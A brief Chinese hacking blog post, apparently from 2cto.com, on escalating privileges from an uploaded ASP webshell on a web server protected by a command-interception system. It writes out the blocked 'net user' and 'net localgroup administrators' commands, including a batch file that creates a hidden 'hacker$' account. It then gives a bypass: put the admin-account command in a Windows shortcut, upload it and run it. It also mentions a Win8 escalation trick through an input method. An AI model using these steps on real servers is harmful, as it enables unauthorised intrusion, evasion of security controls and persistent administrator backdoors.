对于有突破一流信息拦截系统的网站,上传个马就不容易,好容易上传了,还不能执行命令,郁闷了..
执行命令提权的时候因为命令里有 net user 被拦截
换个思路。
运行批命令和直接执行命令效果是一样的,它既然不让执行net命令,我运行批命令还不行吗?
立刻动手,在asp马里点[新建文件] 把名字改称hacker.bat 在内容里写上:
net usernet user hacker$ /del
net usernet user hacker$ hacker /add
net localgroup administrators hacker$ /add
OK。保存!
晕!不成功!直接被拦....
郁闷了一会,又想个办法:在本地弄个批命令,然后上传,这拦截系统总不会对文件拦截吧?
OK。上传!
晕!www.2cto.com 又被拦!...
淫荡方法如下:
1、准备提权命令:%windir%system32cmd.exe /c net user hacker hacker /add & net localgroup administrators hacker /add
2、新建快捷方式,在地址栏写入提权命令
3、上传这个快捷方式
4、在提权工具帮助下运行这个快捷方式.....
5、管理员添加成功....
此法可用于“QQ拼音”输入法帮助打开IE直接提权WIN8